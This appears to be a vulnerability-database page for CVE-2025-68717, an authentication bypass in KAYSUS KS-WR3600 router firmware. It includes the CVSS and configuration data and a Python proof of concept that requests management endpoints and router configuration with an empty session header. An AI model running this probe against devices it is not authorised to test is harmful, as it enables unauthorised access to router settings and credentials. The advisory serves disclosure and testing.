Security Vulnerability Report
CVE-2025-68717 CVSS 9.4 CRITICAL

CVE-2025-68717

Published: 2026-01-08 21:15:43
Last Modified: 2026-02-02 16:35:49

Description

KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 allow authentication bypass during session validation. If any user is logged in, endpoints such as /cgi-bin/system-tool accept unauthenticated requests with empty or invalid session values. This design flaw lets attackers piggyback on another user's active session to retrieve sensitive configuration data or execute privileged actions without authentication.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:o:kaysus:ks-wr3600_firmware:1.0.5.9.1:*:*:*:*:*:*:* - VULNERABLE
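cpe:2.3:h:kaysus:ks-wr3600:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry: the configuration matches firmware 1.0.5.9.1 AND this hardware, so the device is affected when it runs that firmware)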
KAYSUS KS-WR3600 firmware 1.0.5.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
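import requests

# CVE-2025-68717 PoC - KAYSUS KS-WR3600 Authentication Bypass
# Target: KAYSUS KS-WR3600 Router with firmware 1.0.5.9.1
#
# NOTE(review): the advisory text says the bypass applies only while some user
# is logged in to the router, and the only endpoint it names is
# /cgi-bin/system-tool. It does not say how the session value is transmitted.
# The header name, the two extra paths and the POST fields used below are this
# script's assumptions, so a negative result does not show that a device is
# unaffected, and a positive one still needs manual confirmation.
# NOTE(review): this page lists no fixed firmware version; the affected entry
# is firmware 1.0.5.9.1.

target_ip = "192.168.1.1"  # Router IP address
target_port = 80

# Number of response characters echoed to the console. Management responses
# can contain credentials, so only a short sample is printed.
_SAMPLE_CHARS = 200


def exploit_auth_bypass():
    """Probe management endpoints with an empty session value.

    Sends one GET per endpoint to ``target_ip:target_port`` and prints the
    status code, the body size and a short sample of the body.

    HTTP 200 is reported as a *possible* bypass only: the status code alone
    does not distinguish a privileged response from a login or error page
    served with 200, and ``requests`` follows redirects by default.

    Returns:
        None. Results and network errors are printed.
    """
    # Only the first path appears in the advisory text; the other two are
    # unconfirmed guesses by the PoC author.
    endpoints = [
        "/cgi-bin/system-tool",
        "/cgi-bin/status",
        "/cgi-bin/config",
    ]

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Session-ID": "",  # Empty session value (header name is assumed)
        "Content-Type": "application/x-www-form-urlencoded",
    }

    print(f"[*] Testing CVE-2025-68717 on {target_ip}")
    print("[*] Target: KAYSUS KS-WR3600 Firmware 1.0.5.9.1")

    for endpoint in endpoints:
        url = f"http://{target_ip}:{target_port}{endpoint}"

        # Keep the try body to the one call that can raise.
        try:
            response = requests.get(url, headers=headers, timeout=10)
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
            continue

        print(f"\n[+] Endpoint: {endpoint}")
        print(f" Status: {response.status_code}")

        if response.status_code == 200:
            # A 200 is an indicator, not proof; compare the body with what an
            # authenticated session receives before recording a finding.
            print(" Result: HTTP 200 with empty session - possible bypass, verify manually")
            # len(response.content) is the real byte count; len(response.text)
            # counts decoded characters.
            print(f" Response Length: {len(response.content)} bytes")
            if response.text:
                print(f" Sample: {response.text[:_SAMPLE_CHARS]}...")
        else:
            print(" Result: Request blocked or not vulnerable")


def check_system_info():
    """Check whether /cgi-bin/system-tool answers a config request without a session.

    Sends one POST with an empty session value and reports the status code.
    On HTTP 200 only a short sample of the body is printed, because a
    configuration dump can contain credentials that should not end up in
    terminal scrollback or test logs.

    Returns:
        None. Results and network errors are printed.
    """
    url = f"http://{target_ip}:{target_port}/cgi-bin/system-tool"

    headers = {
        "Session-ID": "",  # Empty session value (header name is assumed)
        "User-Agent": "Mozilla/5.0",
    }

    # NOTE(review): these form fields are not described in the advisory text.
    data = {
        "action": "get_config",
        "section": "system",
    }

    try:
        response = requests.post(url, headers=headers, data=data, timeout=10)
    except requests.exceptions.RequestException as e:
        # Same exception scope as exploit_auth_bypass(); programming errors
        # are no longer swallowed by a blanket `except Exception`.
        print(f"[-] Failed to retrieve config: {e}")
        return

    if response.status_code == 200:
        print("\n[+] Retrieved system configuration:")
        print(f" Response Length: {len(response.content)} bytes")
        if response.text:
            print(f" Sample: {response.text[:_SAMPLE_CHARS]}...")
    else:
        # Previously a non-200 answer produced no output at all.
        print(f"\n[-] Config request returned status {response.status_code}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-68717 - KAYSUS KS-WR3600 Auth Bypass PoC")
    print("CVSS Score: 9.4 (CRITICAL)")
    print("=" * 60)

    exploit_auth_bypass()
    check_system_info()

    print("\n[*] PoC completed")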

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68717", "sourceIdentifier": "[email protected]", "published": "2026-01-08T21:15:43.353", "lastModified": "2026-02-02T16:35:48.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 allow authentication bypass during session validation. If any user is logged in, endpoints such as /cgi-bin/system-tool accept unauthenticated requests with empty or invalid session values. This design flaw lets attackers piggyback on another user's active session to retrieve sensitive configuration data or execute privileged actions without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kaysus:ks-wr3600_firmware:1.0.5.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "5A325820-C480-454D-9A4F-AC61604C5566"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kaysus:ks-wr3600:-:*:*:*:*:*:*:*", "matchCriteriaId": "B2859021-9B27-47E2-9802-AE453C915F8D"}]}]}], "references": [{"url": "https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68717.txt", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/actuator/cve/tree/main/KAYSUS", "source": "[email 
protected]", "tags": ["Exploit"]}, {"url": "https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html", "source": "[email protected]", "tags": ["Product"]}]}}